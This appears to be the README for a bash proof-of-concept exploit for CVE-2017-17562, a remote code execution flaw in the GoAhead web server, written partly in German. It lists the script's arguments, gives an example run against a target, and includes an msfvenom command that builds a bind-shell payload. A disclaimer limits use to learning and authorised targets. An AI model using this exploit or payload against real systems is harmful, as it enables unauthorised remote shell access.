
PoC for CVE-2017-17562 written in bash
Eine PoC-Implementierung in Bash für CVE-2017-17562.
Erfordert curl zum Erstellen von HTTP-Anfragen.
Basiert auf den Implementierungen von Metasploit und @fssecur3.
Die folgenden Argumente müssen gesetzt werden, da sie für die Aufklärung und den Payload-Versand erforderlich sind:
$1: IP/Host of remote vulnerable machine being attacked
$2: Port of remote machine webserver
$4: Path to crafted payload being sent to vulnerable machine
Optional können auch die folgenden Argumente gesetzt werden:
$3: If the web server is running under a TLS/SSL tunnel. Defaults to no
$5: Path to list of known vulnerable CGI endpoints, to be used in reconnaissance phase. Defaults to "cgi.endpoints"
bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints
Der vorliegende Code dient ausschließlich zu Lern- und Demonstrationszwecken. Sie dürfen diesen nicht gegen Ziele einsetzen, für die Sie keine Berechtigung haben.
Es werden keine Payloads in diesem Repository bereitgestellt. Allerdings sollte jede Binärdatei, die zur Ziel-OS-Architektur passt, funktionieren. Um einen Bind-Shell-Payload zu erstellen, können Sie msfvenon verwenden:
msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so